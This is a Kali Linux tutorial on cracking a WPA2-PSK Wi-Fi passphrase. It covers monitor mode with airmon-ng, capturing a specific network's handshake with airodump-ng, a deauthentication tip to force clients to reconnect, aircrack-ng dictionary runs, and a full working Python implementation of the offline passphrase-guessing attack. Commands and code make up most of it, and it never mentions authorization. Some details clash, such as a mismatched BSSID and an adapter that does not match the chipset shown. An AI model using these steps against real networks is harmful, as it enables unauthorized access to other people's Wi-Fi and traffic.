Cracking WPA2-PSK with Kali Linux
(brute force with dictionary)
One of the most common attacks against WPA2-PSK is guessing a weak passphrase: capture the 4-way handshake between a client and the access point, then test dictionary words offline until one reproduces the handshake's MIC. Nothing is sent to the network during the cracking phase, so the only limits are the wordlist and the CPU.
Hardware : Alfa AWUS051NH wifi adapter
The iwconfig command will show any wireless cards in the system.
# iwconfig
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
lo no wireless extensions.
eth0 no wireless extensions.
# ifconfig
eth0: flags=4099 mtu 1500
ether 00:23:8b:f0:9e:eb txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1 (Local Loopback)
RX packets 1440 bytes 116640 (113.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1440 bytes 116640 (113.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4099 mtu 1500
ether 00:26:5e:0f:a2:15 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
# ifconfig wlan0 up
# iwlist wlan0 scanning
wlan0 Scan completed :
Cell 01 - Address: 00:47:B7:70:1A:1E
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=47/70 Signal level=-63 dBm
Encryption key:on
ESSID:"Home-Wifi"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=000003d892db3984
Extra: Last beacon: 472ms ago
IE: Unknown: 0014546F7572696E67436C756252686F64616E69656E
IE: Unknown: 010882848B960C121824
IE: Unknown: 030106
IE: Unknown: 0706465220010D14
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: 2D1AAD011BFFFF000000000000000000000000000000000000000000
IE: Unknown: 331AAD011BFFFF000000000000000000000000000000000000000000
IE: Unknown: 3D1606000100000000000000000000000000000000000000
IE: Unknown: 341606000100000000000000000000000000000000000000
IE: Unknown: DD180050F2020101860003A4000027A4000042435E0062322F00
IE: Unknown: DD0900037F01010000FF7F
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : CCMP
Pairwise Ciphers (1) : CCMP
Authentication Suites (1) : PSK
IE: Unknown: DDA90050F204104A0001101044000102103B000103104700
Create the monitor interface with airmon-ng:
# airmon-ng start wlan0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
370 NetworkManager
489 wpa_supplicant

PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)

The warning matters: NetworkManager and wpa_supplicant will keep retuning the card, so if the capture below keeps losing the channel, run 'airmon-ng check kill' first. The station interface wlan0 is gone and a monitor interface wlan0mon has replaced it:

# ifconfig
eth0: flags=4099 mtu 1500
ether 00:23:8b:f0:9e:eb txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1 (Local Loopback)
RX packets 2560 bytes 207360 (202.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2560 bytes 207360 (202.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0mon: flags=4163 mtu 1500
unspec 00-26-5E-0F-A2-15-30-30-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 5084 bytes 1056710 (1.0 MiB)
RX errors 0 dropped 5084 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Use airodump-ng to capture the WPA2 handshake, locked to the target's BSSID and channel so the card does not hop away while the handshake goes by:
# airodump-ng --bssid 00:47:B7:70:1A:1E --channel 6 --write CaptureWPA wlan0mon
(CaptureWPA is the prefix of the capture file; airodump-ng writes CaptureWPA-01.cap)
CH 6 ][ Elapsed: 54 s ][ 2017-04-29 12:00
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:37:B7:80:1A:1E -65 100 571 0 0 6 54e. WPA2 CCMP PSK Home-Wifi
BSSID STATION PWR Rate Lost Frames Probe
With no client associated, #Data stays at 0 and the STATION table is empty, so there is no handshake to capture. Prefer a network that has connected clients, or force one to reconnect: a deauthentication burst from aireplay-ng makes the client re-run the 4-way handshake within seconds, which is far faster than waiting for a natural reconnection. airodump-ng shows "WPA handshake: <BSSID>" in its top-right corner once the capture file holds the messages aircrack-ng needs (message 2 with its MIC, plus the nonces).
# aircrack-ng CaptureWPA-01.cap -w BIG-WPA-LIST-1
(BIG-WPA-LIST-1 is the name of your dictionary file. If the capture contains more than one network, aircrack-ng prompts for an index; add -b 00:47:B7:70:1A:1E or -e Home-Wifi to select the target directly.)
The dictionary file darkc0de.lst is a popular wordlist that ships with BackTrack 5.
Kali does not come with darkc0de.lst, but you can download wordlists from the net, and Kali ships its own under /usr/share/wordlists (rockyou.txt.gz, which must be gunzipped first). Only entries of 8 to 63 characters are valid WPA-PSK passphrases; aircrack-ng skips the rest, so a wordlist full of short passwords wastes nothing but also tests nothing.
Aircrack-ng 1.2 rc4
[03:58:23] 96564163/99563408 keys tested (7270.07 k/s)
Time left: 0 seconds 96.99%
Current passphrase: 8situarla
Master Key : 8C D7 10 C7 F9 55 F3 31 42 8F 50 B3 D5 11 50 54
5A CD 7A 98 71 A6 13 7D 42 8F 82 2A E5 34 60 6D
Transient Key : 4B 33 0F 6B 1C 4F 01 36 C8 B4 8C B2 3B 5D A1 13
7C D9 33 9E B1 A3 3B DA 0F F2 2F 6E E6 E3 0E 86
14 63 A6 1B 41 3D B2 79 21 12 51 06 6A EF 02 45
A7 CA 25 88 16 C8 85 68 34 80 4F 1A 84 D8 62 2F
EAPOL HMAC : 9E 33 72 A4 20 1C 53 BC 8A 50 33 35 F9 75 77 1A
Passphrase not in dictionary
aircrack-ng prints the Master Key (the PMK derived from passphrase and SSID), the Transient Key (the PTK) and the EAPOL HMAC (the handshake MIC) only under a KEY FOUND! banner when a candidate matches. A run that ends with "Passphrase not in dictionary" has exhausted the wordlist without a match; the remedy is a better wordlist or rule-based candidates, because every candidate costs 4096 rounds of PBKDF2 and there is no shortcut around that.
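To make the three values aircrack-ng prints concrete, here is the computation it performs for every wordlist entry, written out as an added example (this is my code, not aircrack-ng's and not from the original page). The SSID, BSSID and station MAC are taken from the scan output above; the nonces, the RSN information element, the replay counter and the passphrase "sunflower2017" are constructed, and the "captured" EAPOL message 2 is built and signed locally so the script runs offline. The chain is PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), PTK = PRF-512(PMK, MACs, nonces), and MIC = HMAC over the EAPOL frame keyed with the first 16 bytes of the PTK (the KCK); the attack succeeds when a candidate's MIC equals the one in the capture.

```python
# Added example (not from the original page): the per-candidate work of a
# WPA2-PSK dictionary attack, run against a constructed handshake.
import hashlib
import hmac
from typing import Iterable, Optional

PRF_LABEL = b"Pairwise key expansion"
KEY_INFO_OFFSET = 5    # EAPOL-Key: 2-byte Key Information field
NONCE_OFFSET = 17      # EAPOL-Key: 32-byte Key Nonce field
MIC_OFFSET = 81        # EAPOL-Key: 16-byte Key MIC field


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """Master Key (PMK): PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The 4096 rounds are what bound the k/s figure aircrack-ng prints."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Transient Key (PTK): 802.11i PRF-512 over the sorted MACs and nonces.
    Bytes 0..15 are the KCK that keys the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, PRF_LABEL + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, frame_mic_zeroed: bytes, key_info: int) -> bytes:
    """EAPOL HMAC (MIC) over the whole EAPOL frame with its MIC field zeroed.
    Descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1-128."""
    version = key_info & 0x0007
    if version == 1:
        return hmac.new(kck, frame_mic_zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, frame_mic_zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {version}")


def zero_mic(frame: bytes) -> bytes:
    return frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]


def build_eapol_msg2(snonce: bytes, key_data: bytes, replay_counter: int = 1) -> bytes:
    """Constructed EAPOL-Key message 2 (station -> AP) with the MIC field still zero."""
    key_info = 0x010A                         # version 2 (CCMP), pairwise, MIC bit set
    body = (b"\x02"                           # descriptor type: RSN
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")         # key length: CCMP temporal key
            + replay_counter.to_bytes(8, "big")
            + snonce
            + b"\x00" * 16                    # key IV
            + b"\x00" * 8                     # key RSC
            + b"\x00" * 8                     # key ID
            + b"\x00" * 16                    # key MIC, filled in by sign_frame
            + len(key_data).to_bytes(2, "big")
            + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type Key


def sign_frame(frame: bytes, kck: bytes) -> bytes:
    key_info = int.from_bytes(frame[KEY_INFO_OFFSET:KEY_INFO_OFFSET + 2], "big")
    mic = eapol_mic(kck, zero_mic(frame), key_info)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack(ssid: str, aa: bytes, spa: bytes, anonce: bytes,
          captured_msg2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the candidate whose PMK -> PTK -> MIC matches the capture."""
    snonce = captured_msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    key_info = int.from_bytes(captured_msg2[KEY_INFO_OFFSET:KEY_INFO_OFFSET + 2], "big")
    expected = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = zero_mic(captured_msg2)
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:     # WPA-PSK bounds; aircrack-ng skips these too
            continue
        ptk = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], zeroed, key_info), expected):
            return candidate
    return None


# Constructed handshake: BSSID and station MAC from the scan above, made-up nonces
# and a made-up passphrase. None of this is the page's real capture.
SSID = "Home-Wifi"
AP_MAC = bytes.fromhex("0047B7701A1E")
STA_MAC = bytes.fromhex("00265E0FA215")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/CCMP/PSK
SECRET = "sunflower2017"


def constructed_capture() -> bytes:
    """What airodump-ng would have written: message 2 carrying a valid MIC under SECRET."""
    kck = ptk_from_pmk(pmk_from_passphrase(SECRET, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return sign_frame(build_eapol_msg2(SNONCE, RSN_IE), kck)


def demo() -> Optional[str]:
    wordlist = ["password", "short", "12345678", "Home-Wifi", "8situarla", "sunflower2017"]
    return crack(SSID, AP_MAC, STA_MAC, ANONCE, constructed_capture(), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Run it and demo() returns "sunflower2017". Two things to take from it: the MIC is keyed only through the PMK, so the SSID is the sole salt, which is why precomputed tables work against default SSIDs but not against an unusual one; and each candidate costs a full 4096-round PBKDF2, so the cracking rate is set by that derivation and a larger wordlist is the only lever once the handshake is in hand.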